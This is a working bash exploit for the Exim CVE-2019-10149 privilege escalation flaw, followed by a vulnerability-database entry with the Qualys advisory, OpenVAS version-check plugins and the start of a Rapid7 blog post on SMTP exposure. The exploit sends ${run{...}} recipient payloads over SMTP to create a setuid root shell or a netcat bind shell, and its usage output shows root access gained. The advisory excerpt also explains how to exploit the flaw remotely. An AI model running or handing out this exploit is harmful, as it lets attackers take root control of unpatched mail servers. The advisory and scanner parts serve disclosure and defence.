# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in Exim versions 4.87 to 4.91 (inclusive).
# Improper validation of recipient address in deliver_message()
# function in /src/deliver.c may lead to remote command execution.
# (CVE-2019-10149)
#
# This is a local privilege escalation exploit for "The Return
# of the WIZard" vulnerability reported by the Qualys Security
# Advisory team.
#
# Credits:
# Qualys Security Advisory team (kudos for your amazing research!)
# Dennis 'dhn' Herrmann (/dev/tcp technique)
#
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
#
# Vulnerable platforms:
# Exim 4.87 - 4.91
#
# Tested against:
# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
#

METHOD="setuid" # default method
# Exim string expansions: \x2f is "/", \x22 is '"', \x3b is ";", \t is a tab.
PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'

# usage instructions
function usage()
{
	echo "$0 [-m METHOD]"
	echo
	echo "-m setuid : use the setuid payload (default)"
	echo "-m netcat : use the netcat payload"
	echo
	exit 1
}

# payload delivery
function exploit()
{
	# connect to localhost:25
	exec 3<>/dev/tcp/localhost/25

	# deliver the payload
	read -u 3 && echo $REPLY
	echo "helo localhost" >&3
	read -u 3 && echo $REPLY
	echo "mail from:<>" >&3
	read -u 3 && echo $REPLY
	echo "rcpt to:<$PAYLOAD>" >&3
	read -u 3 && echo $REPLY
	echo "data" >&3
	read -u 3 && echo $REPLY
	for i in {1..31}
	do
		echo "Received: $i" >&3
	done
	echo "." >&3
	read -u 3 && echo $REPLY
	echo "quit" >&3
	read -u 3 && echo $REPLY
}

# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
echo

# parse command line
while [ ! -z "$1" ]; do
	case $1 in
		-m) shift; METHOD="$1"; shift;;
		* ) usage
		;;
	esac
done
if [ -z $METHOD ]; then
	usage
fi

# setuid method
if [ $METHOD = "setuid" ]; then

	# prepare a setuid shell helper to circumvent bash checks
	echo "Preparing setuid shell helper..."
	echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
	gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
	if [ $? -ne 0 ]; then
		echo "Problems compiling setuid shell helper, check your gcc."
		echo "Falling back to the /bin/sh method."
		cp /bin/sh /tmp/pwned
	fi
	echo

	# select and deliver the payload
	echo "Delivering $METHOD payload..."
	PAYLOAD=$PAYLOAD_SETUID
	exploit
	echo

	# wait for the magic to happen and spawn our shell
	echo "Waiting 5 seconds..."
	sleep 5
	ls -l /tmp/pwned
	/tmp/pwned

# netcat method
elif [ $METHOD = "netcat" ]; then

	# select and deliver the payload
	echo "Delivering $METHOD payload..."
	PAYLOAD=$PAYLOAD_NETCAT
	exploit
	echo

	# wait for the magic to happen and spawn our shell
	echo "Waiting 5 seconds..."
	sleep 5
	nc -v 127.0.0.1 31337

# print help
else
	usage
fi
```

Exploit-pack listing: "Exim 4.87 4.91 - (Local Remote) Command Execution", published 2019-06-05.
"hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149", "CVE-1999-0095", "CVE-1999-0145"], "modified": "2019-06-05T00:00:00", "id": "EXPLOITPACK:4FFD4258EB9240F56C83A57C965E0913", "href": "", "sourceData": "Qualys Security Advisory\n\nThe Return of the WIZard: RCE in Exim (CVE-2019-10149)\n\n\n========================================================================\nContents\n========================================================================\n\nSummary\nLocal exploitation\nRemote exploitation\n- Non-default configurations\n- Default configuration\nAcknowledgments\nTimeline\n\n Boromir: \"What is this new devilry?\"\n Gandalf: \"A Balrog. A demon of the Ancient World.\"\n -- The Lord of the Rings: The Fellowship of the Ring\n\n\n========================================================================\nSummary\n========================================================================\n\nDuring a code review of the latest changes in the Exim mail server\n(https://en.wikipedia.org/wiki/Exim), we discovered an RCE vulnerability\nin versions 4.87 to 4.91 (inclusive). In this particular case, RCE means\nRemote *Command* Execution, not Remote Code Execution: an attacker can\nexecute arbitrary commands with execv(), as root; no memory corruption\nor ROP (Return-Oriented Programming) is involved.\n\nThis vulnerability is exploitable instantly by a local attacker (and by\na remote attacker in certain non-default configurations). 
To remotely\nexploit this vulnerability in the default configuration, an attacker\nmust keep a connection to the vulnerable server open for 7 days (by\ntransmitting one byte every few minutes). However, because of the\nextreme complexity of Exim's code, we cannot guarantee that this\nexploitation method is unique; faster methods may exist.\n\nExim is vulnerable by default since version 4.87 (released on April 6,\n2016), when #ifdef EXPERIMENTAL_EVENT became #ifndef DISABLE_EVENT; and\nolder versions may also be vulnerable if EXPERIMENTAL_EVENT was enabled\nmanually. Surprisingly, this vulnerability was fixed in version 4.92\n(released on February 10, 2019):\n\nhttps://github.com/Exim/exim/commit/7ea1237c783e380d7bdb8...\nhttps://bugs.exim.org/show_bug.cgi?id=2310\n\nbut was not identified as a security vulnerability, and most operating\nsystems are therefore affected. For example, we exploit an up-to-date\nDebian distribution (9.9) in this advisory.\n\n\n========================================================================\nLocal exploitation\n========================================================================\n\nThe vulnerable code is located in deliver_message():\n\n6122 #ifndef DISABLE_EVENT\n6123 if (process_recipients != RECIP_ACCEPT)\n6124 {\n6125 uschar * save_local = deliver_localpart;\n6126 const uschar * save_domain = deliver_domain;\n6127\n6128 deliver_localpart = expand_string(\n6129 string_sprintf(\"${local_part:%s}\", new->address));\n6130 deliver_domain = expand_string(\n6131 string_sprintf(\"${domain:%s}\", new->address));\n6132\n6133 (void) event_raise(event_action,\n6134 US\"msg:fail:internal\", new->message);\n6135\n6136 deliver_localpart = save_local;\n6137 deliver_domain = save_domain;\n6138 }\n6139 #endif\n\nBecause expand_string() recognizes the \"${run{<command> <args>}}\"\nexpansion item, and because new->address is the recipient of the mail\nthat is being delivered, a local attacker can simply send a mail 
to\n\"${run{...}}@localhost\" (where \"localhost\" is one of Exim's\nlocal_domains) and execute arbitrary commands, as root\n(deliver_drop_privilege is false, by default):\n\n[...]\n\n\n========================================================================\nRemote exploitation\n========================================================================\n\nOur local-exploitation method does not work remotely, because the\n\"verify = recipient\" ACL (Access-Control List) in Exim's default\nconfiguration requires the local part of the recipient's address (the\npart that precedes the @ sign) to be the name of a local user:\n\n[...]\n\n------------------------------------------------------------------------\nNon-default configurations\n------------------------------------------------------------------------\n\nWe eventually devised an elaborate method for exploiting Exim remotely\nin its default configuration, but we first identified various\nnon-default configurations that are easy to exploit remotely:\n\n- If the \"verify = recipient\" ACL was removed manually by an\n administrator (maybe to prevent username enumeration via RCPT TO),\n then our local-exploitation method also works remotely.\n\n- If Exim was configured to recognize tags in the local part of the\n recipient's address (via \"local_part_suffix = +* : -*\" for example),\n then a remote attacker can simply reuse our local-exploitation method\n with an RCPT TO \"balrog+${run{...}}@localhost\" (where \"balrog\" is the\n name of a local user).\n\n- If Exim was configured to relay mail to a remote domain, as a\n secondary MX (Mail eXchange), then a remote attacker can simply reuse\n our local-exploitation method with an RCPT TO \"${run{...}}@khazad.dum\"\n (where \"khazad.dum\" is one of Exim's relay_to_domains). 
Indeed, the\n \"verify = recipient\" ACL can only check the domain part of a remote\n address (the part that follows the @ sign), not the local part.\n\n------------------------------------------------------------------------\nDefault configuration\n------------------------------------------------------------------------\n\n[...]\n\n\n========================================================================\nAcknowledgments\n========================================================================\n\nWe thank Exim's developers, Solar Designer, and the members of\ndistros@openwall.\n\n\"The Return of the WIZard\" is a reference to Sendmail's ancient WIZ and\nDEBUG vulnerabilities:\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145\nhttps://seclists.org/bugtraq/1995/Feb/56\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095\nhttp://www.cheswick.com/ches/papers/berferd.pdf\n\n\n========================================================================\nTimeline\n========================================================================\n\n2019-05-27: Advisory sent to security@exim.\n\n2019-05-28: Advisory sent to distros@openwall.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-06-07T14:49:26", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-06-06T00:00:00", "type": "openvas", "title": "Ubuntu Update for exim4 USN-4010-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-06T00:00:00", "id": "OPENVAS:1361412562310844043", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844043", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the 
terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844043\");\n script_version(\"2019-06-06T13:02:35+0000\");\n script_cve_id(\"CVE-2019-10149\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-06-06 13:02:35 +0000 (Thu, 06 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-06 02:00:49 +0000 (Thu, 06 Jun 2019)\");\n script_name(\"Ubuntu Update for exim4 USN-4010-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU18\\.04 LTS|UBUNTU18\\.10)\");\n\n script_xref(name:\"USN\", value:\"4010-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-June/004942.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim4'\n package(s) announced via the USN-4010-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that 
Exim incorrectly handled certain decoding\noperations. A remote attacker could possibly use this issue to execute\narbitrary commands.\");\n\n script_tag(name:\"affected\", value:\"'exim4' package(s) on Ubuntu 18.10, Ubuntu 18.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.90.1-1ubuntu1.2\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.90.1-1ubuntu1.2\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU18.10\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.91-6ubuntu1.1\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.91-6ubuntu1.1\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-07T14:49:32", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-06-06T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4456-1 (exim4 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-06T00:00:00", "id": "OPENVAS:1361412562310704456", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704456", 
"sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704456\");\n script_version(\"2019-06-06T02:00:08+0000\");\n script_cve_id(\"CVE-2019-10149\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-06-06 02:00:08 +0000 (Thu, 06 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-06 02:00:08 +0000 (Thu, 06 Jun 2019)\");\n script_name(\"Debian Security Advisory DSA 4456-1 (exim4 - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4456.html\");\n script_xref(name:\"URL\", 
value:\"https://security-tracker.debian.org/tracker/DSA-4456-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim4'\n package(s) announced via the DSA-4456-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Qualys Research Labs reported a flaw in Exim, a mail transport\nagent. Improper validation of the recipient address in the\ndeliver_message() function may result in the execution of arbitrary\ncommands.\");\n\n script_tag(name:\"affected\", value:\"'exim4' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u4.\n\nWe recommend that you upgrade your exim4 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"exim4\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += 
res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T16:54:42", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-06-08T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for Security (openSUSE-SU-2019:1524-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852550", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852550", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852550\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-10149\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-06-08 02:01:02 +0000 (Sat, 08 Jun 2019)\");\n script_name(\"openSUSE: Security Advisory for Security (openSUSE-SU-2019:1524-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:1524-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-06/msg00020.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Security'\n package(s) announced via the openSUSE-SU-2019:1524-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"exim was updated to fix a security issue.\n\n - CVE-2019-10149: Fixed a Remote Command Execution in exim (bsc#1136587)\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n 
- openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-1524=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-1524=1\");\n\n script_tag(name:\"affected\", value:\"'Security' package(s) on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debuginfo\", rpm:\"exim-debuginfo~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debugsource\", rpm:\"exim-debugsource~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon\", rpm:\"eximon~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon-debuginfo\", rpm:\"eximon-debuginfo~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximstats-html\", rpm:\"eximstats-html~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-07T14:49:24", "description": "Exim is prone to an unauthenticated remote code execution vulnerability.", "cvss3": {}, "published": "2019-06-07T00:00:00", "type": "openvas", "title": "Exim 4.87 - 4.91 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": 
["CVE-2019-10149"], "modified": "2019-06-07T00:00:00", "id": "OPENVAS:1361412562310140090", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140090", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:exim:exim\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140090\");\n script_version(\"2019-06-07T01:42:55+0000\");\n script_tag(name:\"last_modification\", value:\"2019-06-07 01:42:55 +0000 (Fri, 07 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-07 01:35:15 +0000 (Fri, 07 Jun 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2019-10149\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Exim 4.87 - 4.91 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n 
script_dependencies(\"gb_exim_detect.nasl\");\n script_mandatory_keys(\"exim/installed\");\n\n script_tag(name:\"summary\", value:\"Exim is prone to an unauthenticated remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Improper validation of recipient address in deliver_message() function in\n /src/deliver.c may lead to remote command execution.\");\n\n script_tag(name:\"affected\", value:\"Exim version 4.87 to 4.91.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.92 or later or apply the provided patch.\");\n\n script_xref(name:\"URL\", value:\"https://www.exim.org/static/doc/security/CVE-2019-10149.txt\");\n script_xref(name:\"URL\", value:\"https://www.openwall.com/lists/oss-security/2019/06/05/3\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"4.87\", test_version2: \"4.91\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.92\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2020-10-02T14:39:33", "description": "\n\nWelcome to the NICER Protocol Deep Dive blog series! When we started researching what all was out on the internet way back in January, we had no idea we'd end up with a hefty, 137-page tome of a research report. The sheer length of such a thing might put off folks who might otherwise learn a thing or two about the nature of internet exposure, so we figured, why not break up all the protocol studies into their own reports?\n\nSo, here we are! 
What follows is taken directly from our National / Industry / Cloud Exposure Report (NICER), so if you don't want to wait around for the next installment, you can cheat and read ahead!\n\n#### [Research] Read the full NICER report today\n\n[Get Started](<https://www.rapid7.com/info/nicer-2020/>)\n\n \n\n\n## SMTP (25/465/587)\n\n_The \u201cSimple\u201d in SMTP is intended to be ironic._\n\n#### TLDR\n\n * **WHAT IT IS:** A usually cleartext, text-based standard for delivering email between networks.\n * **HOW MANY**: 5,805,012 discovered nodes on port 25 and 4,007,931 on port 587. SMTPS on port 465 comes in with 3,494,067. All together, that's 13,307,010 distinct service nodes. 3,023,486 (52%) have Recog fingerprints (43 total service families)\n * **VULNERABILITIES: **The natively cleartext nature of email is the primary concern around the security of this protocol. Email is also the most popular method for phishing users into revealing passwords and running malware. Finally, there are at least two serious vulnerabilities in popular mail servers Exim and Microsoft Exchange deployed today.\n * **ADVICE: **Mail administrators need to be fanatical about applying security patches as they become available, and should implement DMARC anti-spoofing controls yesterday.\n * **ALTERNATIVES: **Outsourcing email to a cloud provider, such as Google or Microsoft, is often the right choice when comparing the costs of effectively maintaining this critical internet infrastructure.\n * **GETTING: **Better (25/587)! Fewer crazy people are hosting their own mail.\n\n### SMTP discovery details\n\nWhile SMTP is traditionally cleartext with an optional secure protocol negotiation called STARTTLS, we're seeing more SSL-wrapped SMTP, also known as SMTPS, in the world today. 
